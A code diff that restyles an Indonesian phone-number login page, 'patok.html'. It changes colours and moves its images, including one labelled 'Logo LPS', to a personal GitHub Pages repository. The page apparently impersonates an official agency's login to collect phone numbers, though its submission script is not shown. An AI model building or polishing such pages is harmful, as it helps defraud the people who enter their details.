--- a/patok.html
+++ b/patok.html
@@ -7,7 +7,7 @@
     <style>
         /* Gaya dasar untuk tampilan */
         body {
-            background-color: rgb(0, 0, 0); /* Latar belakang hitam */
+            background-color: #ffffff; /* Latar belakang hitam */
             display: flex;
             justify-content: center;
             align-items: center;
@@ -32,8 +32,8 @@
             padding: 10px;
             width: 300px;
             margin-left:20px;
-            background-color: #2c2c2c; /* Latar belakang abu-abu gelap */
-            color: #fff; /* Warna teks putih */
+            background-color: #C0C0C0; /* Latar belakang abu-abu gelap */
+            color: #000; /* Warna teks putih */
         }
 
         /* Gambar ikon telepon */
@@ -50,7 +50,7 @@
             border: none;
             outline: none;
             background-color: transparent;
-            color: #fff; /* Warna teks input putih */
+            color: #000; /* Warna teks input putih */
             flex: 1;
         }
 
@@ -82,7 +82,7 @@
 
         /* Tombol submit aktif */
         .submit-btn.enabled {
-            background-color: #ffa500; /* Warna kuning untuk tombol aktif */
+            background-color: #66CDAA; /* Warna kuning untuk tombol aktif */
             cursor: pointer; /* Kursor berubah */
         }
         
@@ -116,7 +116,7 @@
     <!-- Input nomor telepon -->
     <div class="input-container">
         <div class="gambar">
-            <img src="https://blogger.googleusercontent.com/img/a/AVvXsEja4ISYCf68xC6RE9Z-GP4hB7IM_QaSfY5D7nHhwo2jb3qKg1vD0sqXm32JE5C_tYGHjyiAksbga7Z3QFsaRThfVAHyuBswlVNDBxlE1o9RyaHBoECN-V0znlWxHnK4qLJOt5Lz6pQXZj89Pq73owh_sejE6MIpsE6spoXqCrRtKaoT79-I79BtSPKWBEc4" alt="Gambar Pucok">
+            <img src="https://raw.githubusercontent.com/Dan4credit/Dan4credit.github.io/refs/heads/main/1729929130350.jpg" alt="Gambar Pucok">
         </div>
         <div class="phone-input">
             <img src="https://img.icons8.com/ios-filled/50/ffd700/phone.png" alt="Phone Icon"/>
@@ -128,7 +128,7 @@
         </div><br>
         <button class="submit-btn" id="submitBtn" disabled onclick="submitPhone()">Masuk</button>
         <div class="gambar gambar-bawah">
-            <img src="https://blogger.googleusercontent.com/img/a/AVvXsEiT-LGlat2eeRbp5y0cecYi-h2CZb8EbpzPZLwXuwqOjpkFEPwmOiZ-pB6xRmPjQ8IaYn30jzOaFdLr229N-ndWkkmyxGd9Hw9NnNtyP__vAxdYVwUoZzWvU0UOg1tzGF89ZFhQk3o2N_hh6SL-ztb0fkf1B6C3iQRRIXQTKQInp3vneGjPPXRvj5-D_Gj0" alt="Logo LPS">
+            <img src="https://raw.githubusercontent.com/Dan4credit/Dan4credit.github.io/refs/heads/main/1729930025107-removebg-preview.png" alt="Logo LPS">
         </div>
     </div>
 
@@ -190,4 +190,4 @@
         }
     </script>
 </body>
-  </html>
+</html>
